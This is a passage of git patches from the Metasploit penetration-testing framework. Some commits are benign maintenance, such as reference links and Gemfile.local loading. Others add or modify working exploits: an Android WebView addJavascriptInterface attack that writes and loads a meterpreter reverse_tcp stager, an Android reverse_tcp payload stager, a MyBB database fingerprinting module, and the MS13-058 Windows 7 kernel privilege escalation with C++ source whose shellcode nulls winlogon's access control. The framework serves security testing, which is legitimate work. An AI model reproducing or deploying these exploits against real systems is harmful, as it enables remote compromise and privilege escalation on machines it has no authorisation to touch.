'http://us1.php.net/eval'] + [ 'URL', 'http://us1.php.net/file_get_contents'] ], 'Platform' => 'php', 'Targets' => From c8940c37f54e28da1c68ff28178cd81403f088c2 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 21 Feb 2014 09:23:08 -0500 Subject: [PATCH 035/853] Updating References --- modules/exploits/multi/python/py_web_delivery.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/python/py_web_delivery.rb b/modules/exploits/multi/python/py_web_delivery.rb index a3af5380ce..09a4f73365 100644 --- a/modules/exploits/multi/python/py_web_delivery.rb +++ b/modules/exploits/multi/python/py_web_delivery.rb @@ -34,7 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'References' => [ - [ 'URL', 'http://www.securitypadawan.blogspot.com/2.html'] + [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'] + [ 'URL', 'http://docs.python.org/2/library/urllib2.html'] ], 'Platform' => 'py', 'Targets' => From fcfb48fda150ddf524d7421d53500768c0782274 Mon Sep 17 00:00:00 2001 From: kn0 Date: Fri, 21 Feb 2014 13:37:31 -0600 Subject: [PATCH 036/853] Added support for Gemfile.local --- .gitignore | 2 ++ lib/msfenv.rb | 8 +++++++- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index 82e108ff0c..4065cd3dce 100644 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,6 @@ .bundle +Gemfile.local +Gemfile.local.lock # Rubymine project directory .idea # Sublime Text project directory (not created by ST by default) diff --git a/lib/msfenv.rb b/lib/msfenv.rb index a6e00a1df6..641e62d504 100644 --- a/lib/msfenv.rb +++ b/lib/msfenv.rb @@ -2,7 +2,13 @@ # Use bundler to load dependencies # -ENV['BUNDLE_GEMFILE'] ||= ::File.expand_path(::File.join(::File.dirname(__FILE__), "..", "Gemfile")) +gemfile_base = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..")) +if File.readable?(::File.join(gemfile_base,"Gemfile.local")) + ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile.local") +else + ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile") +end + begin require 'bundler/setup' rescue ::LoadError From 4ac8e23e48631c9dae8ca7d970d5c2ae4d5436e0 Mon Sep 17 00:00:00 2001 From: kn0 Date: Fri, 21 Feb 2014 15:31:12 -0600 Subject: [PATCH 037/853] Changed to clearner solution proposed by @limhoff-r7. --- lib/msfenv.rb | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/lib/msfenv.rb b/lib/msfenv.rb index 641e62d504..c3cfdf6461 100644 --- a/lib/msfenv.rb +++ b/lib/msfenv.rb @@ -2,11 +2,25 @@ # Use bundler to load dependencies # -gemfile_base = ::File.expand_path(::File.join(::File.dirname(__FILE__), "..")) -if File.readable?(::File.join(gemfile_base,"Gemfile.local")) - ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile.local") -else - ENV['BUNDLE_GEMFILE'] ||= ::File.join(gemfile_base, "Gemfile") +GEMFILE_EXTENSIONS = [ + '.local', + '' +] + +unless ENV['BUNDLE_GEMFILE'] + require 'pathname' + + msfenv_real_pathname = Pathname.new(__FILE__).realpath + root = msfenv_real_pathname.parent.parent + + GEMFILE_EXTENSIONS.each do |extension| + extension_pathname = root.join("Gemfile#{extension}") + + if extension_pathname.readable? + ENV['BUNDLE_GEMFILE'] = extension_pathname.to_path + break + end + end end begin From 255d2c4db91f178a175df6975a8a1dc9e2a01dce Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 19 Feb 2014 15:06:11 +0000 Subject: [PATCH 038/853] android payload golf --- data/android/apk/res/drawable-mdpi/icon.png | Bin 3079 -> 0 bytes data/android/apk/res/layout/main.xml | Bin 700 -> 0 bytes modules/payloads/stagers/android/reverse_tcp.rb | 2 -- 3 files changed, 2 deletions(-) delete mode 100644 data/android/apk/res/drawable-mdpi/icon.png delete mode 100644 data/android/apk/res/layout/main.xml diff --git a/data/android/apk/res/drawable-mdpi/icon.png b/data/android/apk/res/drawable-mdpi/icon.png deleted file mode 100644 index c2e4f5634b903742c71baa0e2e080aa1ee5e2190..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3079 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 ZRGiiSHLrJh&yw#f@jh!P{3T!B%^%F5jrsrp diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index d41922f40e..174c6c5613 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -41,8 +41,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] From 1e14ec7f6cbbb322249f67d59bb53b83fbb417e4 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 25 Feb 2014 00:13:18 +0000 Subject: [PATCH 039/853] native jni stager --- .../browser/webview_addjavascriptinterface.rb | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..344403fd8e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'DefaultOptions' => { 'PrependFork' => true }, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, @@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end + def dalvikstager() + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') + data = File.read(localfile, {:mode => 'rb'}) + data + end + def js %Q| function exec(obj) { @@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; + var runtime = m.invoke(null, null); + var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; // get the process name, which will give us our data path - var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } - path += '/#{Rex::Text.rand_text_alpha(8)}'; + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/stage.apk'; - // build the binary, chmod it, and execute it - m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); - m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); - m.invoke(null, null).exec([path]); + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + runtime.load(libraryPath); return true; } From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 040/853] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 2a1e96165cf1a4b627d543c0add64e39ef4d72b5 Mon Sep 17 00:00:00 2001 From: kyuzo Date: Thu, 6 Mar 2014 18:39:34 +0000 Subject: [PATCH 041/853] Adding MS013-058 for Windows7 x86 --- data/exploits/cve-2013-1300/schlamperei.dll | Bin 0 -> 10240 bytes .../source/exploits/cve-2013-1300/dllmain.cpp | 288 ++++++++++++++++++ .../windows/local/ms13_058_schlamperei.rb | 129 ++++++++ 3 files changed, 417 insertions(+) create mode 100644 data/exploits/cve-2013-1300/schlamperei.dll create mode 100644 external/source/exploits/cve-2013-1300/dllmain.cpp create mode 100644 modules/exploits/windows/local/ms13_058_schlamperei.rb diff --git a/data/exploits/cve-2013-1300/schlamperei.dll b/data/exploits/cve-2013-1300/schlamperei.dll new file mode 100644 index 0000000000000000000000000000000000000000..68b6fe9b1d42adbe5d8d66c83aa00676cbea8428 GIT binary patch literal 10240 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 0) LONG NTSTATUS; +typedef NTSTATUS *PNTSTATUS; +#endif + +#define MAX_PAGE 4096 + +#define TABLE_BASE 0xff910000 + +// global variables FTW +HWND gHwnd = 0x0; +unsigned int gEPROCESS = 0x0; +unsigned gPid = 0x0; + +typedef struct _HANDLEENTRY { + VOID *phead; + VOID *pOwner; + UINT8 bType; + UINT8 bFlags; + UINT16 wUniq; +} HANDLEENTRY, *PHANDLEENTRY; + +DWORD gethandleaddress(HANDLE h) { + HMODULE mod = GetModuleHandleA("user32.dll"); + DWORD* sharedinfo = (DWORD*)GetProcAddress(mod, "gSharedInfo"); + PHANDLEENTRY handles = (PHANDLEENTRY)sharedinfo[1]; + DWORD index = (DWORD)h&0x3ff; + HANDLEENTRY entry = handles[index]; + return (DWORD)entry.phead; +} + +DWORD kernelwndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { + WORD um=0; + __asm { + mov ax, cs + mov um, ax + } + if(um == 0x1b) { + + } else { + // KERNEL MODE CODE EXECUTION + // shellcode to change ACL of winlogon.exe to 0x0 + __asm { + mov eax, hwnd // WND + mov eax, [eax+8] // THREADINFO + mov eax, [eax] // ETHREAD + mov eax, [eax+0x150] // KPROCESS + mov eax, [eax+0xb8] // flink + procloop: + lea edx, [eax-0xb8] // KPROCESS + mov eax, [eax] + add edx, 0x16c // module name + cmp dword ptr [edx], 0x6c6e6977 // "winl" for winlogon.exe + jne procloop + sub edx, 0x170 + mov dword ptr [edx], 0x0 // null acl + mov eax, [edx + 0xb8] // write winlogon pid to global var + mov gPid, eax + } + return 0x201000; + } + return DefWindowProcW(hwnd,msg,wparam,lparam); +} + +HWND createhelperwnd() { + WNDCLASSA wndclass; + HANDLE hinst = GetModuleHandleA(0); + DWORD rc = 0; + + wndclass.style = 0x4000; + wndclass.lpfnWndProc = (WNDPROC)kernelwndproc; + wndclass.cbClsExtra = 0; + wndclass.cbWndExtra = 0; + wndclass.hInstance = (HINSTANCE)hinst; + wndclass.hIcon = LoadIconA(0, (LPCSTR)0x107); + wndclass.hCursor = 0; + wndclass.hbrBackground = (HBRUSH)6; + wndclass.lpszMenuName = 0; + wndclass.lpszClassName = (LPCSTR) 0x1338; + rc=RegisterClassA(&wndclass); + HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1338, "helper", 0, 0, 0, 0, 0, 0, 0, 0, hinst); + + return windowhandle; +} + +typedef NTSTATUS __stdcall NtAllocateVirtualMemory_T(HANDLE processHandle, + PVOID *baseAddress, + ULONG_PTR zeroBits, + PSIZE_T regionSize, + ULONG allocationType, + ULONG protect); + +BOOL AllocFakeEProcess(DWORD address) { + unsigned int addr = 0x200000; + DWORD allocsize = 0x4000; + int x=0; + + NtAllocateVirtualMemory_T * pfnNtAllocateVirtualMemory = 0; + pfnNtAllocateVirtualMemory = (NtAllocateVirtualMemory_T *)GetProcAddress( + GetModuleHandleA("ntdll.dll"), "NtAllocateVirtualMemory"); + + + unsigned o = (0x20 / 4); // the offset into the page + NTSTATUS res = 0x0; + + for(x=0; x<0x60; x++) { + res = pfnNtAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID*)&addr, 0, &allocsize, 0x3000, 0x40); + if(res == 0x0) { + + break; + } + + addr += 0x10000; + } + if(res!=0) return false; + memset((void*)addr, 0xab, 0x4000); + UINT *eprocess = (UINT*)addr+o; + UINT *before = (UINT*)addr; + // large enough values to hold reference + before[2] = 0x00080000; + before[3] = 0x400000; + UINT *second = (UINT*)addr + (0x1000/4); + for(x=0; x<100; x++) eprocess[x] = (0xdead<<16) + (0xaa00 | x); + + eprocess[0] = 0x03030303; // least significant byte == 0x3 + + // Pointer to EPROCESS_QUOTA_BLOCK + // Will point into the window object and on decrement flip the flag to enable the kernel mode window procedure + eprocess[0xd4/4] = address; + + gEPROCESS = (unsigned int)eprocess; + //for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x); + //second[0x20] = 0x2; + //second[0x30] = 0x1; + return true; +} + +DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { + if(msg == 0xd) { + // triggering the exploit through WM_GETTEXT + // printf("[-] WM_GETTEXT message\n"); + unsigned char payload[] = "ABCDE "; + payload[7] = (gEPROCESS>>16) & 0xff; + memcpy((void *) lparam, (void *)payload, 8); + return 8; + } + return DefWindowProcA(hwnd, msg, wparam, lparam); +} + +DWORD windowthreadproc(LPVOID arg) { + WNDCLASSA wndclass; + HANDLE hinst = GetModuleHandleA(0); + DWORD rc = 0; + MSG msg; + + wndclass.style = 0x4000; + wndclass.lpfnWndProc = (WNDPROC)wndproc; + wndclass.cbClsExtra = 0; + wndclass.cbWndExtra = 0; + wndclass.hInstance = (HINSTANCE)hinst; + wndclass.hIcon = LoadIconA(0, (LPCSTR)0x107); + wndclass.hCursor = 0; + wndclass.hbrBackground = (HBRUSH)6; + wndclass.lpszMenuName = 0; + wndclass.lpszClassName = (LPCSTR) 0x1337; + rc=RegisterClassA(&wndclass); + + HWND windowhandle = CreateWindowExA(0, (LPCSTR) 0x1337, "Jon Rocks!", 0, 0, 0, 0, 0, 0, 0, 0, hinst); + + gHwnd = windowhandle; + + while(1) { + GetMessageA(&msg, 0x0, 0x0, 0x0); + TranslateMessage(&msg); + DispatchMessageA(&msg); + } + + return 0; +} + +DWORD NtUserMessageCall(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam, DWORD result, DWORD fnid, DWORD ansi) { + __asm { + push ansi + push fnid + push result + push lparam + push wparam + push msg + push hwnd + push 0xdeadbeef + mov eax, 11eah + mov 